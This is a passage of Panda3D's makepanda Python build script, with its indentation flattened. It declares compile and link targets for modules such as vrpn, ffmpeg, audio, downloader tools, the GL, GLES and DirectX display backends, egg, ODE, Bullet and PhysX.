OPTS=['DIR:panda/metalibs/pandafx', 'DIR:panda/src/distort', 'NVIDIACG', 'PYTHON']
TargetAdd('fx_module.obj', input='libp3distort.in')
TargetAdd('fx_module.obj', opts=OPTS)
TargetAdd('fx_module.obj', opts=['IMOD:panda3d.fx', 'ILIB:fx', 'IMPORT:panda3d.core'])
TargetAdd('fx.pyd', input='fx_module.obj')
TargetAdd('fx.pyd', input='libp3distort_igate.obj')
TargetAdd('fx.pyd', input='libpandafx.dll')
TargetAdd('fx.pyd', input='libp3interrogatedb.dll')
TargetAdd('fx.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('fx.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/vrpn/
#
if (PkgSkip("VRPN")==0 and not RUNTIME):
OPTS=['DIR:panda/src/vrpn', 'BUILDING:VRPN', 'VRPN']
TargetAdd('p3vrpn_composite1.obj', opts=OPTS, input='p3vrpn_composite1.cxx')
TargetAdd('libp3vrpn.dll', input='p3vrpn_composite1.obj')
TargetAdd('libp3vrpn.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3vrpn.dll', opts=['VRPN'])
OPTS=['DIR:panda/src/vrpn', 'VRPN', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/vrpn', ["*.h", "*_composite*.cxx"])
TargetAdd('libp3vrpn.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3vrpn.in', opts=['IMOD:panda3d.vrpn', 'ILIB:libp3vrpn', 'SRCDIR:panda/src/vrpn'])
TargetAdd('libp3vrpn_igate.obj', input='libp3vrpn.in', opts=["DEPENDENCYONLY"])
TargetAdd('vrpn_module.obj', input='libp3vrpn.in')
TargetAdd('vrpn_module.obj', opts=OPTS)
TargetAdd('vrpn_module.obj', opts=['IMOD:panda3d.vrpn', 'ILIB:vrpn', 'IMPORT:panda3d.core'])
TargetAdd('vrpn.pyd', input='vrpn_module.obj')
TargetAdd('vrpn.pyd', input='libp3vrpn_igate.obj')
TargetAdd('vrpn.pyd', input='libp3vrpn.dll')
TargetAdd('vrpn.pyd', input='libp3interrogatedb.dll')
TargetAdd('vrpn.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('vrpn.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/ffmpeg
#
if PkgSkip("FFMPEG") == 0 and not RUNTIME:
if not PkgSkip("SWSCALE"):
DefSymbol("FFMPEG", "HAVE_SWSCALE")
if not PkgSkip("SWRESAMPLE"):
DefSymbol("FFMPEG", "HAVE_SWRESAMPLE")
OPTS=['DIR:panda/src/ffmpeg', 'BUILDING:FFMPEG', 'FFMPEG', 'SWSCALE', 'SWRESAMPLE']
TargetAdd('p3ffmpeg_composite1.obj', opts=OPTS, input='p3ffmpeg_composite1.cxx', dep=[
'dtool_have_swscale.dat', 'dtool_have_swresample.dat'])
TargetAdd('libp3ffmpeg.dll', input='p3ffmpeg_composite1.obj')
TargetAdd('libp3ffmpeg.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3ffmpeg.dll', opts=OPTS)
#
# DIRECTORY: panda/src/audiotraits/
#
if PkgSkip("FMODEX") == 0 and not RUNTIME:
OPTS=['DIR:panda/src/audiotraits', 'BUILDING:FMOD_AUDIO', 'FMODEX']
TargetAdd('fmod_audio_fmod_audio_composite1.obj', opts=OPTS, input='fmod_audio_composite1.cxx')
TargetAdd('libp3fmod_audio.dll', input='fmod_audio_fmod_audio_composite1.obj')
TargetAdd('libp3fmod_audio.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3fmod_audio.dll', opts=['MODULE', 'ADVAPI', 'WINUSER', 'WINMM', 'FMODEX'])
if PkgSkip("OPENAL") == 0 and not RUNTIME:
OPTS=['DIR:panda/src/audiotraits', 'BUILDING:OPENAL_AUDIO', 'OPENAL']
TargetAdd('openal_audio_openal_audio_composite1.obj', opts=OPTS, input='openal_audio_composite1.cxx')
TargetAdd('libp3openal_audio.dll', input='openal_audio_openal_audio_composite1.obj')
TargetAdd('libp3openal_audio.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3openal_audio.dll', opts=['MODULE', 'ADVAPI', 'WINUSER', 'WINMM', 'WINSHELL', 'WINOLE', 'OPENAL'])
#
# DIRECTORY: panda/src/downloadertools/
#
if (PkgSkip("OPENSSL")==0 and not RTDIST and not RUNTIME and PkgSkip("DEPLOYTOOLS")==0):
OPTS=['DIR:panda/src/downloadertools', 'OPENSSL', 'ZLIB', 'ADVAPI', 'WINSOCK2', 'WINSHELL', 'WINGDI', 'WINUSER']
TargetAdd('apply_patch_apply_patch.obj', opts=OPTS, input='apply_patch.cxx')
TargetAdd('apply_patch.exe', input=['apply_patch_apply_patch.obj'])
TargetAdd('apply_patch.exe', input=COMMON_PANDA_LIBS)
TargetAdd('apply_patch.exe', opts=OPTS)
TargetAdd('build_patch_build_patch.obj', opts=OPTS, input='build_patch.cxx')
TargetAdd('build_patch.exe', input=['build_patch_build_patch.obj'])
TargetAdd('build_patch.exe', input=COMMON_PANDA_LIBS)
TargetAdd('build_patch.exe', opts=OPTS)
if not PkgSkip("ZLIB"):
TargetAdd('check_adler_check_adler.obj', opts=OPTS, input='check_adler.cxx')
TargetAdd('check_adler.exe', input=['check_adler_check_adler.obj'])
TargetAdd('check_adler.exe', input=COMMON_PANDA_LIBS)
TargetAdd('check_adler.exe', opts=OPTS)
TargetAdd('check_crc_check_crc.obj', opts=OPTS, input='check_crc.cxx')
TargetAdd('check_crc.exe', input=['check_crc_check_crc.obj'])
TargetAdd('check_crc.exe', input=COMMON_PANDA_LIBS)
TargetAdd('check_crc.exe', opts=OPTS)
TargetAdd('check_md5_check_md5.obj', opts=OPTS, input='check_md5.cxx')
TargetAdd('check_md5.exe', input=['check_md5_check_md5.obj'])
TargetAdd('check_md5.exe', input=COMMON_PANDA_LIBS)
TargetAdd('check_md5.exe', opts=OPTS)
TargetAdd('pdecrypt_pdecrypt.obj', opts=OPTS, input='pdecrypt.cxx')
TargetAdd('pdecrypt.exe', input=['pdecrypt_pdecrypt.obj'])
TargetAdd('pdecrypt.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pdecrypt.exe', opts=OPTS)
TargetAdd('pencrypt_pencrypt.obj', opts=OPTS, input='pencrypt.cxx')
TargetAdd('pencrypt.exe', input=['pencrypt_pencrypt.obj'])
TargetAdd('pencrypt.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pencrypt.exe', opts=OPTS)
TargetAdd('show_ddb_show_ddb.obj', opts=OPTS, input='show_ddb.cxx')
TargetAdd('show_ddb.exe', input=['show_ddb_show_ddb.obj'])
TargetAdd('show_ddb.exe', input=COMMON_PANDA_LIBS)
TargetAdd('show_ddb.exe', opts=OPTS)
#
# DIRECTORY: panda/src/downloadertools/
#
if (PkgSkip("ZLIB")==0 and not RTDIST and not RUNTIME and PkgSkip("DEPLOYTOOLS")==0):
OPTS=['DIR:panda/src/downloadertools', 'ZLIB', 'OPENSSL', 'ADVAPI', 'WINSOCK2', 'WINSHELL', 'WINGDI', 'WINUSER']
TargetAdd('multify_multify.obj', opts=OPTS, input='multify.cxx')
TargetAdd('multify.exe', input=['multify_multify.obj'])
TargetAdd('multify.exe', input=COMMON_PANDA_LIBS)
TargetAdd('multify.exe', opts=OPTS)
TargetAdd('pzip_pzip.obj', opts=OPTS, input='pzip.cxx')
TargetAdd('pzip.exe', input=['pzip_pzip.obj'])
TargetAdd('pzip.exe', input=COMMON_PANDA_LIBS)
TargetAdd('pzip.exe', opts=OPTS)
TargetAdd('punzip_punzip.obj', opts=OPTS, input='punzip.cxx')
TargetAdd('punzip.exe', input=['punzip_punzip.obj'])
TargetAdd('punzip.exe', input=COMMON_PANDA_LIBS)
TargetAdd('punzip.exe', opts=OPTS)
#
# DIRECTORY: panda/src/windisplay/
#
if (GetTarget() == 'windows' and not RUNTIME):
OPTS=['DIR:panda/src/windisplay', 'BUILDING:PANDAWIN']
TargetAdd('p3windisplay_composite1.obj', opts=OPTS+["BIGOBJ"], input='p3windisplay_composite1.cxx')
TargetAdd('p3windisplay_windetectdx9.obj', opts=OPTS + ["DX9"], input='winDetectDx9.cxx')
TargetAdd('libp3windisplay.dll', input='p3windisplay_composite1.obj')
TargetAdd('libp3windisplay.dll', input='p3windisplay_windetectdx9.obj')
TargetAdd('libp3windisplay.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3windisplay.dll', opts=['WINIMM', 'WINGDI', 'WINKERNEL', 'WINOLDNAMES', 'WINUSER', 'WINMM',"BIGOBJ"])
#
# DIRECTORY: panda/metalibs/pandadx9/
#
if GetTarget() == 'windows' and PkgSkip("DX9")==0 and not RUNTIME:
OPTS=['DIR:panda/src/dxgsg9', 'BUILDING:PANDADX', 'DX9', 'NVIDIACG', 'CGDX9']
TargetAdd('p3dxgsg9_dxGraphicsStateGuardian9.obj', opts=OPTS, input='dxGraphicsStateGuardian9.cxx')
TargetAdd('p3dxgsg9_composite1.obj', opts=OPTS, input='p3dxgsg9_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandadx9', 'BUILDING:PANDADX', 'DX9', 'NVIDIACG', 'CGDX9']
TargetAdd('pandadx9_pandadx9.obj', opts=OPTS, input='pandadx9.cxx')
TargetAdd('libpandadx9.dll', input='pandadx9_pandadx9.obj')
TargetAdd('libpandadx9.dll', input='p3dxgsg9_dxGraphicsStateGuardian9.obj')
TargetAdd('libpandadx9.dll', input='p3dxgsg9_composite1.obj')
TargetAdd('libpandadx9.dll', input='libp3windisplay.dll')
TargetAdd('libpandadx9.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandadx9.dll', opts=['MODULE', 'ADVAPI', 'WINGDI', 'WINKERNEL', 'WINUSER', 'WINMM', 'DX9', 'NVIDIACG', 'CGDX9'])
#
# DIRECTORY: panda/src/egg/
#
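# Note (added): parser.yxx/lexer.lxx are the Bison/Flex sources for the egg syntax
# (BISONPREFIX_eggyy renames the generated yy* symbols); parser.h is created up front so
# it already exists before the Bison-generated version replaces it.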
if not RUNTIME and not PkgSkip("EGG"):
OPTS=['DIR:panda/src/egg', 'BUILDING:PANDAEGG', 'ZLIB', 'BISONPREFIX_eggyy', 'FLEXDASHI']
CreateFile(GetOutputDir()+"/include/parser.h")
TargetAdd('p3egg_parser.obj', opts=OPTS, input='parser.yxx')
TargetAdd('parser.h', input='p3egg_parser.obj', opts=['DEPENDENCYONLY'])
TargetAdd('p3egg_lexer.obj', opts=OPTS, input='lexer.lxx')
TargetAdd('p3egg_composite1.obj', opts=OPTS, input='p3egg_composite1.cxx')
TargetAdd('p3egg_composite2.obj', opts=OPTS, input='p3egg_composite2.cxx')
OPTS=['DIR:panda/src/egg', 'ZLIB', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/egg', ["*.h", "*_composite*.cxx"])
if "parser.h" in IGATEFILES: IGATEFILES.remove("parser.h")
TargetAdd('libp3egg.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3egg.in', opts=['IMOD:panda3d.egg', 'ILIB:libp3egg', 'SRCDIR:panda/src/egg'])
TargetAdd('libp3egg_igate.obj', input='libp3egg.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3egg_eggGroupNode_ext.obj', opts=OPTS, input='eggGroupNode_ext.cxx')
#
# DIRECTORY: panda/src/egg2pg/
#
if not RUNTIME and not PkgSkip("EGG"):
OPTS=['DIR:panda/src/egg2pg', 'BUILDING:PANDAEGG']
TargetAdd('p3egg2pg_composite1.obj', opts=OPTS, input='p3egg2pg_composite1.cxx')
TargetAdd('p3egg2pg_composite2.obj', opts=OPTS, input='p3egg2pg_composite2.cxx')
OPTS=['DIR:panda/src/egg2pg', 'PYTHON']
IGATEFILES=['load_egg_file.h']
TargetAdd('libp3egg2pg.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libp3egg2pg.in', opts=['IMOD:panda3d.egg', 'ILIB:libp3egg2pg', 'SRCDIR:panda/src/egg2pg'])
TargetAdd('libp3egg2pg_igate.obj', input='libp3egg2pg.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/src/framework/
#
if (not RUNTIME):
deps = []
# Framework wants to link in a renderer when building statically, so tell it what is available.
if GetLinkAllStatic():
deps = ['dtool_have_gl.dat', 'dtool_have_tinydisplay.dat', 'dtool_have_egg.dat']
if not PkgSkip("GL"):
DefSymbol("FRAMEWORK", "HAVE_GL")
if not PkgSkip("TINYDISPLAY"):
DefSymbol("FRAMEWORK", "HAVE_TINYDISPLAY")
if not PkgSkip("EGG"):
DefSymbol("FRAMEWORK", "HAVE_EGG")
OPTS=['DIR:panda/src/framework', 'BUILDING:FRAMEWORK', 'FRAMEWORK']
TargetAdd('p3framework_composite1.obj', opts=OPTS, input='p3framework_composite1.cxx', dep=deps)
TargetAdd('libp3framework.dll', input='p3framework_composite1.obj')
TargetAdd('libp3framework.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3framework.dll', opts=['ADVAPI'])
#
# DIRECTORY: panda/src/glgsg/
#
if (not RUNTIME and PkgSkip("GL")==0):
OPTS=['DIR:panda/src/glgsg', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG']
TargetAdd('p3glgsg_config_glgsg.obj', opts=OPTS, input='config_glgsg.cxx')
TargetAdd('p3glgsg_glgsg.obj', opts=OPTS, input='glgsg.cxx')
#
# DIRECTORY: panda/src/glesgsg/
#
if (not RUNTIME and PkgSkip("GLES")==0):
OPTS=['DIR:panda/src/glesgsg', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES', 'GLES']
TargetAdd('p3glesgsg_config_glesgsg.obj', opts=OPTS, input='config_glesgsg.cxx')
TargetAdd('p3glesgsg_glesgsg.obj', opts=OPTS, input='glesgsg.cxx')
#
# DIRECTORY: panda/src/gles2gsg/
#
if (not RUNTIME and PkgSkip("GLES2")==0):
OPTS=['DIR:panda/src/gles2gsg', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES2', 'GLES2']
TargetAdd('p3gles2gsg_config_gles2gsg.obj', opts=OPTS, input='config_gles2gsg.cxx')
TargetAdd('p3gles2gsg_gles2gsg.obj', opts=OPTS, input='gles2gsg.cxx')
#
# DIRECTORY: panda/metalibs/pandaegg/
#
if not RUNTIME and not PkgSkip("EGG"):
OPTS=['DIR:panda/metalibs/pandaegg', 'DIR:panda/src/egg', 'BUILDING:PANDAEGG']
TargetAdd('pandaegg_pandaegg.obj', opts=OPTS, input='pandaegg.cxx')
TargetAdd('libpandaegg.dll', input='pandaegg_pandaegg.obj')
TargetAdd('libpandaegg.dll', input='p3egg2pg_composite1.obj')
TargetAdd('libpandaegg.dll', input='p3egg2pg_composite2.obj')
TargetAdd('libpandaegg.dll', input='p3egg_composite1.obj')
TargetAdd('libpandaegg.dll', input='p3egg_composite2.obj')
TargetAdd('libpandaegg.dll', input='p3egg_parser.obj')
TargetAdd('libpandaegg.dll', input='p3egg_lexer.obj')
TargetAdd('libpandaegg.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaegg.dll', opts=['ADVAPI'])
OPTS=['DIR:panda/metalibs/pandaegg', 'DIR:panda/src/egg', 'PYTHON']
TargetAdd('egg_module.obj', input='libp3egg2pg.in')
TargetAdd('egg_module.obj', input='libp3egg.in')
TargetAdd('egg_module.obj', opts=OPTS)
TargetAdd('egg_module.obj', opts=['IMOD:panda3d.egg', 'ILIB:egg', 'IMPORT:panda3d.core'])
TargetAdd('egg.pyd', input='egg_module.obj')
TargetAdd('egg.pyd', input='p3egg_eggGroupNode_ext.obj')
TargetAdd('egg.pyd', input='libp3egg_igate.obj')
TargetAdd('egg.pyd', input='libp3egg2pg_igate.obj')
TargetAdd('egg.pyd', input='libpandaegg.dll')
TargetAdd('egg.pyd', input='libp3interrogatedb.dll')
TargetAdd('egg.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('egg.pyd', opts=['PYTHON'])
#
# DIRECTORY: panda/src/x11display/
#
if (GetTarget() not in ['windows', 'darwin'] and PkgSkip("X11")==0 and not RUNTIME):
OPTS=['DIR:panda/src/x11display', 'BUILDING:PANDAX11', 'X11']
TargetAdd('p3x11display_composite1.obj', opts=OPTS, input='p3x11display_composite1.cxx')
#
# DIRECTORY: panda/src/glxdisplay/
#
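# Note (added): the pandagl metalib targets below ('pandagl_pandagl.obj', 'libpandagl.dll')
# are declared again in the Cocoa, Carbon and Windows branches that follow; only the branch
# matching the current target platform runs, so libpandagl.dll always links exactly one
# windowing backend.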
if (GetTarget() not in ['windows', 'darwin'] and PkgSkip("GL")==0 and PkgSkip("X11")==0 and not RUNTIME):
OPTS=['DIR:panda/src/glxdisplay', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('p3glxdisplay_composite1.obj', opts=OPTS, input='p3glxdisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagl', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('pandagl_pandagl.obj', opts=OPTS, input='pandagl.cxx')
TargetAdd('libpandagl.dll', input='p3x11display_composite1.obj')
TargetAdd('libpandagl.dll', input='pandagl_pandagl.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_config_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glxdisplay_composite1.obj')
TargetAdd('libpandagl.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagl.dll', opts=['MODULE', 'GL', 'NVIDIACG', 'CGGL', 'X11'])
#
# DIRECTORY: panda/src/cocoadisplay/
#
if (GetTarget() == 'darwin' and PkgSkip("COCOA")==0 and PkgSkip("GL")==0 and not RUNTIME):
OPTS=['DIR:panda/src/cocoadisplay', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('p3cocoadisplay_composite1.obj', opts=OPTS, input='p3cocoadisplay_composite1.mm')
OPTS=['DIR:panda/metalibs/pandagl', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('pandagl_pandagl.obj', opts=OPTS, input='pandagl.cxx')
TargetAdd('libpandagl.dll', input='pandagl_pandagl.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_config_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3cocoadisplay_composite1.obj')
if (PkgSkip('PANDAFX')==0):
TargetAdd('libpandagl.dll', input='libpandafx.dll')
TargetAdd('libpandagl.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagl.dll', opts=['MODULE', 'GL', 'NVIDIACG', 'CGGL', 'COCOA', 'CARBON'])
#
# DIRECTORY: panda/src/osxdisplay/
#
elif (GetTarget() == 'darwin' and PkgSkip("CARBON")==0 and PkgSkip("GL")==0 and not RUNTIME):
OPTS=['DIR:panda/src/osxdisplay', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('p3osxdisplay_composite1.obj', opts=OPTS, input='p3osxdisplay_composite1.cxx')
TargetAdd('p3osxdisplay_osxGraphicsWindow.obj', opts=OPTS, input='osxGraphicsWindow.mm')
OPTS=['DIR:panda/metalibs/pandagl', 'BUILDING:PANDAGL', 'GL', 'NVIDIACG', 'CGGL']
TargetAdd('pandagl_pandagl.obj', opts=OPTS, input='pandagl.cxx')
TargetAdd('libpandagl.dll', input='pandagl_pandagl.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_config_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3osxdisplay_composite1.obj')
TargetAdd('libpandagl.dll', input='p3osxdisplay_osxGraphicsWindow.obj')
if (PkgSkip('PANDAFX')==0):
TargetAdd('libpandagl.dll', input='libpandafx.dll')
TargetAdd('libpandagl.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagl.dll', opts=['MODULE', 'GL', 'NVIDIACG', 'CGGL', 'CARBON', 'AGL', 'COCOA'])
#
# DIRECTORY: panda/src/wgldisplay/
#
if (GetTarget() == 'windows' and PkgSkip("GL")==0 and not RUNTIME):
OPTS=['DIR:panda/src/wgldisplay', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGL', 'NVIDIACG', 'CGGL']
TargetAdd('p3wgldisplay_composite1.obj', opts=OPTS, input='p3wgldisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagl', 'BUILDING:PANDAGL', 'NVIDIACG', 'CGGL']
TargetAdd('pandagl_pandagl.obj', opts=OPTS, input='pandagl.cxx')
TargetAdd('libpandagl.dll', input='pandagl_pandagl.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_config_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3glgsg_glgsg.obj')
TargetAdd('libpandagl.dll', input='p3wgldisplay_composite1.obj')
TargetAdd('libpandagl.dll', input='libp3windisplay.dll')
if (PkgSkip('PANDAFX')==0):
TargetAdd('libpandagl.dll', input='libpandafx.dll')
TargetAdd('libpandagl.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagl.dll', opts=['MODULE', 'WINGDI', 'GL', 'WINKERNEL', 'WINOLDNAMES', 'WINUSER', 'WINMM', 'NVIDIACG', 'CGGL'])
#
# DIRECTORY: panda/src/egldisplay/
#
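# Note (added): the same p3egldisplay sources are compiled twice: here with OPENGLES_1
# defined for the GLES 1 flavour (libpandagles), and in the next block with OPENGLES_2
# for the GLES 2 flavour (libpandagles2).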
if (PkgSkip("EGL")==0 and PkgSkip("GLES")==0 and PkgSkip("X11")==0 and not RUNTIME):
DefSymbol('GLES', 'OPENGLES_1', '')
OPTS=['DIR:panda/src/egldisplay', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES', 'GLES', 'EGL']
TargetAdd('pandagles_egldisplay_composite1.obj', opts=OPTS, input='p3egldisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagles', 'BUILDING:PANDAGLES', 'GLES', 'EGL']
TargetAdd('pandagles_pandagles.obj', opts=OPTS, input='pandagles.cxx')
TargetAdd('libpandagles.dll', input='p3x11display_composite1.obj')
TargetAdd('libpandagles.dll', input='pandagles_pandagles.obj')
TargetAdd('libpandagles.dll', input='p3glesgsg_config_glesgsg.obj')
TargetAdd('libpandagles.dll', input='p3glesgsg_glesgsg.obj')
TargetAdd('libpandagles.dll', input='pandagles_egldisplay_composite1.obj')
TargetAdd('libpandagles.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagles.dll', opts=['MODULE', 'GLES', 'EGL', 'X11'])
#
# DIRECTORY: panda/src/egldisplay/
#
if (PkgSkip("EGL")==0 and PkgSkip("GLES2")==0 and PkgSkip("X11")==0 and not RUNTIME):
DefSymbol('GLES2', 'OPENGLES_2', '')
OPTS=['DIR:panda/src/egldisplay', 'DIR:panda/src/glstuff', 'BUILDING:PANDAGLES2', 'GLES2', 'EGL']
TargetAdd('pandagles2_egldisplay_composite1.obj', opts=OPTS, input='p3egldisplay_composite1.cxx')
OPTS=['DIR:panda/metalibs/pandagles2', 'BUILDING:PANDAGLES2', 'GLES2', 'EGL']
TargetAdd('pandagles2_pandagles2.obj', opts=OPTS, input='pandagles2.cxx')
TargetAdd('libpandagles2.dll', input='p3x11display_composite1.obj')
TargetAdd('libpandagles2.dll', input='pandagles2_pandagles2.obj')
TargetAdd('libpandagles2.dll', input='p3gles2gsg_config_gles2gsg.obj')
TargetAdd('libpandagles2.dll', input='p3gles2gsg_gles2gsg.obj')
TargetAdd('libpandagles2.dll', input='pandagles2_egldisplay_composite1.obj')
TargetAdd('libpandagles2.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandagles2.dll', opts=['MODULE', 'GLES2', 'EGL', 'X11'])
#
# DIRECTORY: panda/src/ode/
#
if (PkgSkip("ODE")==0 and not RUNTIME):
OPTS=['DIR:panda/src/ode', 'BUILDING:PANDAODE', 'ODE', 'PYTHON']
TargetAdd('p3ode_composite1.obj', opts=OPTS, input='p3ode_composite1.cxx')
TargetAdd('p3ode_composite2.obj', opts=OPTS, input='p3ode_composite2.cxx')
TargetAdd('p3ode_composite3.obj', opts=OPTS, input='p3ode_composite3.cxx')
OPTS=['DIR:panda/src/ode', 'ODE', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/ode', ["*.h", "*_composite*.cxx"])
IGATEFILES.remove("odeConvexGeom.h")
IGATEFILES.remove("odeHeightFieldGeom.h")
IGATEFILES.remove("odeHelperStructs.h")
TargetAdd('libpandaode.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandaode.in', opts=['IMOD:panda3d.ode', 'ILIB:libpandaode', 'SRCDIR:panda/src/ode'])
TargetAdd('libpandaode_igate.obj', input='libpandaode.in', opts=["DEPENDENCYONLY"])
TargetAdd('p3ode_ext_composite.obj', opts=OPTS, input='p3ode_ext_composite.cxx')
#
# DIRECTORY: panda/metalibs/pandaode/
#
if (PkgSkip("ODE")==0 and not RUNTIME):
OPTS=['DIR:panda/metalibs/pandaode', 'BUILDING:PANDAODE', 'ODE']
TargetAdd('pandaode_pandaode.obj', opts=OPTS, input='pandaode.cxx')
TargetAdd('libpandaode.dll', input='pandaode_pandaode.obj')
TargetAdd('libpandaode.dll', input='p3ode_composite1.obj')
TargetAdd('libpandaode.dll', input='p3ode_composite2.obj')
TargetAdd('libpandaode.dll', input='p3ode_composite3.obj')
TargetAdd('libpandaode.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaode.dll', opts=['WINUSER', 'ODE'])
OPTS=['DIR:panda/metalibs/pandaode', 'ODE', 'PYTHON']
TargetAdd('ode_module.obj', input='libpandaode.in')
TargetAdd('ode_module.obj', opts=OPTS)
TargetAdd('ode_module.obj', opts=['IMOD:panda3d.ode', 'ILIB:ode', 'IMPORT:panda3d.core'])
TargetAdd('ode.pyd', input='ode_module.obj')
TargetAdd('ode.pyd', input='libpandaode_igate.obj')
TargetAdd('ode.pyd', input='p3ode_ext_composite.obj')
TargetAdd('ode.pyd', input='libpandaode.dll')
TargetAdd('ode.pyd', input='libp3interrogatedb.dll')
TargetAdd('ode.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('ode.pyd', opts=['PYTHON', 'WINUSER', 'ODE'])
#
# DIRECTORY: panda/src/bullet/
#
if (PkgSkip("BULLET")==0 and not RUNTIME):
OPTS=['DIR:panda/src/bullet', 'BUILDING:PANDABULLET', 'BULLET']
TargetAdd('p3bullet_composite.obj', opts=OPTS, input='p3bullet_composite.cxx')
OPTS=['DIR:panda/src/bullet', 'BULLET', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/bullet', ["*.h", "*_composite*.cxx"])
TargetAdd('libpandabullet.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandabullet.in', opts=['IMOD:panda3d.bullet', 'ILIB:libpandabullet', 'SRCDIR:panda/src/bullet'])
TargetAdd('libpandabullet_igate.obj', input='libpandabullet.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/pandabullet/
#
if (PkgSkip("BULLET")==0 and not RUNTIME):
OPTS=['DIR:panda/metalibs/pandabullet', 'BUILDING:PANDABULLET', 'BULLET']
TargetAdd('pandabullet_pandabullet.obj', opts=OPTS, input='pandabullet.cxx')
TargetAdd('libpandabullet.dll', input='pandabullet_pandabullet.obj')
TargetAdd('libpandabullet.dll', input='p3bullet_composite.obj')
TargetAdd('libpandabullet.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandabullet.dll', opts=['WINUSER', 'BULLET'])
OPTS=['DIR:panda/metalibs/pandabullet', 'BULLET', 'PYTHON']
TargetAdd('bullet_module.obj', input='libpandabullet.in')
TargetAdd('bullet_module.obj', opts=OPTS)
TargetAdd('bullet_module.obj', opts=['IMOD:panda3d.bullet', 'ILIB:bullet', 'IMPORT:panda3d.core'])
TargetAdd('bullet.pyd', input='bullet_module.obj')
TargetAdd('bullet.pyd', input='libpandabullet_igate.obj')
TargetAdd('bullet.pyd', input='libpandabullet.dll')
TargetAdd('bullet.pyd', input='libp3interrogatedb.dll')
TargetAdd('bullet.pyd', input=COMMON_PANDA_LIBS)
TargetAdd('bullet.pyd', opts=['PYTHON', 'WINUSER', 'BULLET'])
#
# DIRECTORY: panda/src/physx/
#
if (PkgSkip("PHYSX")==0):
OPTS=['DIR:panda/src/physx', 'BUILDING:PANDAPHYSX', 'PHYSX', 'NOARCH:PPC', 'PYTHON']
TargetAdd('p3physx_composite.obj', opts=OPTS, input='p3physx_composite.cxx')
OPTS=['DIR:panda/src/physx', 'PHYSX', 'NOARCH:PPC', 'PYTHON']
IGATEFILES=GetDirectoryContents('panda/src/physx', ["*.h", "*_composite*.cxx"])
TargetAdd('libpandaphysx.in', opts=OPTS, input=IGATEFILES)
TargetAdd('libpandaphysx.in', opts=['IMOD:panda3d.physx', 'ILIB:libpandaphysx', 'SRCDIR:panda/src/physx'])
TargetAdd('libpandaphysx_igate.obj', input='libpandaphysx.in', opts=["DEPENDENCYONLY"])
#
# DIRECTORY: panda/metalibs/pandaphysx/
#
if (PkgSkip("PHYSX")==0):
OPTS=['DIR:panda/metalibs/pandaphysx', 'BUILDING:PANDAPHYSX', 'PHYSX', 'NOARCH:PPC']
TargetAdd('pandaphysx_pandaphysx.obj', opts=OPTS, input='pandaphysx.cxx')
TargetAdd('libpandaphysx.dll', input='pandaphysx_pandaphysx.obj')
TargetAdd('libpandaphysx.dll', input='p3physx_composite.obj')
TargetAdd('libpandaphysx.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libpandaphysx.dll', opts=['WINUSER', 'PHYSX', 'NOARCH:PPC', 'PYTHON'])
OPTS=['DIR:panda/metalibs/pandaphysx', 'PHYSX', 'NOARCH:PPC', 'PYTHON']
